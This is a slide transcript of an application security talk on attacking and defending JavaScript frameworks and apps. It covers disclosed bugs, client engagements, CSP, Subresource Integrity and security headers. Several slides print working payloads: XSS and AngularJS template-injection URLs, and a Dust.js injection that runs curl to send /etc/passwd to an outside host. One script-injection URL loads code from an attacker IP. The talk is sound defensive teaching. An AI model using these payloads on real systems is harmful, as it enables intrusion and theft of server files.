Safety_Not_Guaranteed-v2.pdf

Transcript

1. Safety Not Guaranteed Application Security Clinic Riyaz Walikar | @riyazwalikar

2. ▪ Pragmatic, holistic, business-focused approach ▪ Specialist Application Security company

   ▪ Highly experienced and diverse team ▪ Commercial ▪ Security; Gold Standards About Appsecco Def Con speakers Assigned multiple CVEs Certified Hackers OWASP chapter leads
3. None

4. Appsecco Application Security Clinic?

5. Appsecco Application Security Clinic Time & Space for Security Discussion

6. Appsecco Security Clinic • This talk (here) • Curated Q&A

   + Birds of a Feather discussion (Banquet Hall)

7. $("input[name='Riyaz Walikar']") • Chief Attacker at Appsecco • Several years

   of experience in breaking stuff (Offensive Security) • All kinds of things (applications/mobile/systems/networks/wireless) • New to JavaScript Frameworks and Libraries

8. I break stuff for a living NaD {Not a Developer}

9. What will we look at today? • What do attackers

   target when attacking JS apps? • Publicly disclosed security weaknesses in frameworks/libraries/apps • Client side security weaknesses • Server side security weaknesses • Stories from the field • Impact of exploitation – Demos ☺ • A brief overview of Content Security Policy • Using Subresource Integrity • Additional Security Headers

10. Profile, Target and Attack! What do attackers target in JS

    apps?
11. None

12. Attacker Setup

13. When looking at JS Apps • Identification of the framework/libraries

    • Previously discovered security issues, bypasses, feature abuses • Sources (eg: <input>) and Sinks (eg: .innerHTML) for user supplied data • Error messages and stack traces / Console logging • Client side dynamic and hardcoded variables/tokens/secrets/keys • Communication channels like websockets, webRTC etc.

14. Security Weaknesses Popular publicly disclosed vulnerabilities, bypasses and feature abuses

15. Client Side Weaknesses • Mavo and DOM based XSS •

    Angular and Template Injection • Script Injection in MDWiki

16. Mavo and DOM based XSS • Abusing the $url object

    ($url.queryparam) <a href="{$url.spec}" mv-attribute="null"></a> /?spec=test

17. Mavo and DOM based XSS /?spec=javascript:alert(1)//../css-images /?spec=javascript:alert(1)%252f%252f..%252fcss

18. Angular JS & (Expression) Template Injection • Templating can be

    tricky {{}} • Uber no quotes bug! (Shouts to @portswigger and @0x6d6172696f) • Server did not allow quotes, but Angular was present (templating?) • Angular 1.2.0 which bans accessing constructor via a regular javascript property like obj.constructor • Final exploit obtained the string “constructor” from multiple literals and created a Angular template
19. None

20. Demo • https://x41.co/angular.php?q={{%20c=[];%20o=toString();%20t=o.anchor(tru e);%20f=o.anchor(false);%20c.push(o[5]);%20c.push(o[1]);%20c.push(t[3]); %20c.push(f[12]);%20c.push(t[9]);%20c.push(t[10]);%20c.push(t[11]);%20c. push(o[5]);%20c.push(t[9]);%20c.push(o[1]);%20c.push(t[10]);%20a=c.join( []);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototype Of(a.sub),a).value,0,toString()[c.join([])].fromCharCode(97,108,101,114, 116,40,49,41))()%20}}

21. XSS in MDWiki • MDWiki allows markdown files to be

    loaded using URI fragments • http://example.com/#!index.md • The code did a xhr to location.hash.split('#!')[1] • Exploit? /#!https://x41.co/mdxss.php

22. Server Side Weaknesses • Node.js (Dust.js) user input eval •

    Server Side Template Injection in Jade • Node.js unserialize() code execution

23. Node.js (Dust.js) user input eval • Found on a PayPal

    subdomain by Michael Stepankin (@artsploit) • Dust.js is a JS templating engine for Node • Dust.js used ‘if helper’ – Removed in 1.6.0 release http://demo.paypal.com/us/demo/navigation?device=desktop

24. Node.js (Dust.js) user input eval

25. Node.js (Dust.js) user input eval • Send array instead of

    string to bypass filters • Parsed by the qs module • Final payload https://_demo.paypal.com/demo/navigation?device[]=x&device[]=y'- require('child_process').exec('curl+- F+"x=`cat+/etc/passwd`"+artsploit.com')-'
26. None

27. Server Side Template Injection in Jade (Pug) • Jade (renamed

    to Pug now) is a templating engine for Node • This is not a vulnerability in itself but an example of how templating can lead to code execution if user input is not properly sanitized • The example is using CodePen.io • No vulnerability in CodePen or Jade itself • Example of feature abuse based on the context and implementation

28. Server Side Template Injection in Jade (Pug)

29. Server Side Template Injection in Jade (Pug)

30. None

31. Node.js unserialize() code execution • Discovered during a Node.js code

    review by Ajin, a fellow security community researcher • User’s cookie was sent to the unserialize() function of the node- serialize module. Internally uses eval() for deserialization • Passing untrusted client sent data to unserialize can result in code execution on the server - CVE-2017-5941

32. Node.js unserialize() code execution

33. Stories from the field How we compromised apps and servers

    using info leaks and JS weaknesses

34. Tell me your secret • Very large client in the

    financial sector • Using a React app to deliver UI. JSON authenticated endpoints populated the data • The password was encrypted using a static key before being sent to the server and presumably decrypted on the server for verification • The key and IV was stored in plaintext in a convoluted mass of client side JS

35. Tell me your secret • The client was reusing the

    same crypto components on multiple sites • Leaking the key and IV would allow decryption on the client side possible • A data breach leaking encrypted credentials would massively hurt the client more so because it would be possible to decrypt the credentials

36. Typo & and a ClickJacking attack • Very large client

    in the financial sector • Resource heavy JS framework • Had the X-Frame-Options header set to prevent ClickJacking attacks • However, Burpsuite kept complaining that the site was vulnerable • Investigation revealed a typo in the header

37. Typo & and a ClickJacking attack

38. Typo & and a ClickJacking attack • Allowed us to

    iframe the site and create a PoC for phishing attacks • The fix was as simple as removing the space before the header

39. Script Injection due to a weak regex • Large customer

    in the automobile industry • Blog had functionality to load pages from the webroot directory • Site was loading pages via XHR requests http://example.com/#register • Cross site requests were being prevented using a regex check

40. Script Injection due to a weak regex

41. Script Injection due to a weak regex http://client-domain/#http://attacker-ip/a.js?client-domain • Successful

    XSS exploitation led to compromising a higher privileged account • Obtained full access to the client’s data

42. So What? What exactly can the attacker do? What’s the

    impact of an actual exploit?
43. None
44. None
45. None
46. None

47. Remote Code Execution via node-serialize CVE-2017-5941

48. Content Security Policy Using the Browser to Protect your users

49. Content Security Policy • Content-Security-Policy HTTP response header helps you

    reduce XSS risks on modern browsers by declaring what dynamic resources are allowed to load via a HTTP Header.

50. Directives default-src script-src style-src img-src connect-src font-src object-src media-src frame-src

    sandbox report-uri child-src form-action frame-ancestors plugin-types require-sri-for

51. How does a policy look like? default-src 'none'; script-src 'self';

    connect-src 'self'; img-src 'self'; style- src 'self';
52. None

53. CSP Reporting • report-uri directive enables reporting • Violation reports

    are sent as a JSON POST request to the URI in the header

54. CSP Reporting • Consider this policy • The html of

    signup.html

55. CSP Reporting

56. Subresource Integrity Is the file you fetched, really the file

    you fetched?

57. SRI – What is? • Subresource Integrity (SRI) is a

    security feature that enables browsers to verify that files they fetch (for example, from a CDN) are delivered without unexpected manipulation. • It works by allowing you to provide a cryptographic hash that a fetched file must match. • Why?

58. Example

59. How to generate? cat FILENAME.js | openssl dgst -sha384 -binary

    | openssl enc -base64 –A shasum -b -a 384 FILENAME.js | xxd -r -p | base64

60. CSP + SRI Content-Security-Policy: require-sri-for script; Content-Security-Policy: require-sri-for style;

61. Additional Security Headers What else can be used to slow

    down attackers?

62. X-XSS-Protection • Designed to enable and enforce the XSS filter

    built into modern browsers

63. HTTP Strict Transport Security (HSTS) • Restricts browsers to access

    content only over HTTPS

64. X-Frame-Options • Prevents pages from being loaded in Iframes, thereby

    providing clickjacking protection

65. X-Content-Type-Options • The x-content-type header prevents Internet Explorer and Google

    Chrome from sniffing a response away from the declared content- type.

66. What more?

67. Don’t think this will stop attackers

68. None

69. Retire.js

70. CSP Evaluator

71. Building Secure Stuff – Where to start? • The OWASP

    Project • OWASP ASVS • OWASP Top 10 • OWASP Testers Guide • Security documentation for the framework/library that is being used • Think like a potential attacker • Attack surface? • What are the assumptions in the system?

72. So when looking at JS Apps • Identification of the

    framework/libraries • Previously discovered security issues, bypasses, feature abuses • Sources and Sinks for user supplied data • Endpoints discoverable through JS code • Error messages and stack traces • Console logging • Client side dynamic and hardcoded variables/tokens/secrets/keys • Browser Storage mechanisms • Cross origin communication using postMessage, widgets, CORS • External sources of js/css/images/fonts • Communication protocols like websockets, webRTC etc.

73. Appsecco Application Security Clinic • @appseccouk • @riyazwalikar

74. alert(/thank you/) @riyazwalikar | @appseccouk

75. Content References • https://github.com/jquery/jquery/issues/2432 • https://github.com/cure53/mustache-security/tree/master/wiki • http://blog.portswigger.net/2016/04/adapting-angularjs-payloads-to-exploit.html • http://blog.portswigger.net/2017/09/abusing-javascript-frameworks-to-bypass.html

    • http://www.ccs.neu.edu/home/arshad/publications/ndss2017jslibs.pdf • http://www.levigross.com/2014/06/11/how-to-find-xss-in-knockout.js-applications/ • https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ • http://blog.portswigger.net/2015/08/server-side-template-injection.html • http://artsploit.blogspot.in/2016/08/pprce2.html • https://blog.appsecco.com/nodejs-and-a-simple-rce-exploit-d79001837cc6 • https://en.wikipedia.org/wiki/Immediately-invoked_function_expression • https://content-security-policy.com/ • https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy • https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP#Enabling_reporting • https://developer.moilla.org/en-US/docs/Web/Security/Subresource_Integrity • https://www.keycdn.com/blog/http-security-headers/

76. Image References • https://pixabay.com/en/destroy-smash-breaking-shatter-30616/ • https://pixabay.com/en/coding-computer-computer-user-pc- 1294361/ • https://pixabay.com/p-156624/?no_redirect